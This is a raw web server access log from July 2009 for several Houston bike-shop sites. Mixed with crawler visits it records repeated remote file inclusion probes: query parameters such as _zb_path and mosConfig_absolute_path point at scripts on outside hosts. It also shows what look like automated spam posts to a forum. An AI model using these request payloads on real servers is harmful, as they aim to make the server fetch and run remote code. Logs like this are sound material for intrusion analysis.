72.30.142.180 - - [12/Jul/2009:11:57:14 -0700] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:35 -0700] "GET /logs/access.log//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:37 -0700] "GET /?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:44 -0700] "GET /logs//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:53 -0700] "GET /logs/access.log//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:54 -0700] "GET /logs//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:03:54 -0700] "GET /?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:09:50 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:09:50 -0700] "GET /logs//?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:09:50 -0700] "GET /?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:10:19 -0700] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:10:19 -0700] "GET /?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:10:19 -0700] "GET /logs/access.log//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:21 -0700] "GET /logs/access.log//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:21 -0700] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:21 -0700] "GET /?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:41 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:41 -0700] "GET /logs//?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:12:41 -0700] "GET /?_zb_path=http://www.smilewig.com/bbs/cache/log/fx29id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:13:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:13:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:13:39 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:14:05 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:14:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:12:14:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:12:16:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:12:24:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:12:30:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
220.181.61.234 - - [12/Jul/2009:12:30:44 -0700] "GET / HTTP/1.1" 200 1764 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:25 -0700] "GET /logs/access.log//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:25 -0700] "GET /?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:25 -0700] "GET /logs//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "houstonbikeshop.com"
204.124.180.66 - - [12/Jul/2009:12:34:43 -0700] "GET / HTTP/1.1" 200 1764 "www.onlinepharmacylist.com" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:47 -0700] "GET /logs/access.log//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:49 -0700] "GET /logs//?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:34:49 -0700] "GET /?_zb_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:12:36:22 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.0" 200 517 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:12:36:23 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:12:36:23 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:12:36:24 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:12:36:24 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:40:27 -0700] "GET /logs/access.log//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:40:27 -0700] "GET /?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:40:27 -0700] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
207.182.133.50 - - [12/Jul/2009:12:43:19 -0700] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
207.182.133.50 - - [12/Jul/2009:12:43:19 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
207.182.133.50 - - [12/Jul/2009:12:43:19 -0700] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.61.197 - - [12/Jul/2009:12:43:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "houstonbikeshop.com"
220.181.61.197 - - [12/Jul/2009:12:45:26 -0700] "GET /bullitinboard/viewtopic.php?p=4157 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:45:49 -0700] "GET /logs/access.log//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:45:50 -0700] "GET /logs//?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:12:45:50 -0700] "GET /?_zb_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "houstonbikeshop.com"
82.194.87.219 - - [12/Jul/2009:12:50:15 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
207.182.133.50 - - [12/Jul/2009:12:51:40 -0700] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:55:49 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:55:49 -0700] "GET /?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:55:49 -0700] "GET /logs//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:56:12 -0700] "GET /logs//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:56:12 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:12:56:12 -0700] "GET /?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.194.87.219 - - [12/Jul/2009:13:03:44 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:46 -0700] "GET /logs//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:46 -0700] "GET /?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:46 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:47 -0700] "GET /?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:47 -0700] "GET /logs//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [12/Jul/2009:13:08:47 -0700] "GET /logs/access.log%20%20//?_zb_path=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:13:08:53 -0700] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:13:08:54 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:13:08:54 -0700] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
208.80.195.49 - - [12/Jul/2009:13:13:48 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; PrimusDSLEN; .NET CLR 1.1.4322)" "houstonbikeshop.com"
218.158.98.196 - - [12/Jul/2009:13:44:05 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://www.tlm-cash.com//administrator/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.158.98.196 - - [12/Jul/2009:13:44:05 -0700] "GET /logs/send_reminders.php?includedir=http://www.tlm-cash.com//administrator/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.158.98.196 - - [12/Jul/2009:13:44:05 -0700] "GET /send_reminders.php?includedir=http://www.tlm-cash.com//administrator/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.158.98.196 - - [12/Jul/2009:13:48:14 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.tlm-cash.com//administrator/components/com_virtuemart/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.67 - - [12/Jul/2009:14:01:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.67 - - [12/Jul/2009:14:01:32 -0700] "GET /translations/?D=D HTTP/1.1" 200 3847 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.73 - - [12/Jul/2009:14:05:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.73 - - [12/Jul/2009:14:05:23 -0700] "GET /translations/Italian.txt HTTP/1.1" 200 33975 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
81.19.66.38 - - [12/Jul/2009:14:09:10 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:14:09:10 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:14:09:11 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:14:09:12 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:14:09:12 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
119.63.193.129 - - [12/Jul/2009:14:14:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
65.55.106.122 - - [12/Jul/2009:14:17:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
82.194.87.219 - - [12/Jul/2009:14:18:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
65.55.108.195 - - [12/Jul/2009:14:26:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.108.195 - - [12/Jul/2009:14:26:40 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
8.12.144.17 - - [12/Jul/2009:14:58:57 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "LG-CU920/V1.0s Obigo/Q05A Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.20.06.3.1.20.0 Novarra-Vision/7.3" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:14:59:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:14:59:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:15:07:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:15:07:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:15:13:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:15:13:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:15:17:00 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:15:25:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:15:28:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:15:32:26 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
193.47.80.45 - - [12/Jul/2009:15:33:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [12/Jul/2009:15:33:53 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:15:37:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:15:43:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:15:57:46 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:15:57:46 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:15:57:47 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
208.80.195.37 - - [12/Jul/2009:16:20:13 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; sbcydsl 3.12; .NET CLR 1.1.4322; yplus 5.1.04b)" "svbikes.com"
65.55.106.122 - - [12/Jul/2009:16:26:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
60.191.15.206 - - [12/Jul/2009:16:52:23 -0700] "GET /bullitinboard/viewtopic.php?t=2208&highlight= HTTP/1.1" 200 533 "http://www.finesthealthinsure.com/elders-health-quatation-www-agent-of-moreno-valley-ca.html" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.svbikes.com"
189.133.95.227 - - [12/Jul/2009:17:22:40 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.svbikes.com"
189.133.95.227 - - [12/Jul/2009:17:22:42 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.svbikes.com"
189.133.95.227 - - [12/Jul/2009:17:22:42 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.svbikes.com"
189.133.95.227 - - [12/Jul/2009:17:22:46 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.svbikes.com"
81.19.66.38 - - [12/Jul/2009:17:26:34 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:17:26:34 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:17:26:35 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:17:26:36 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
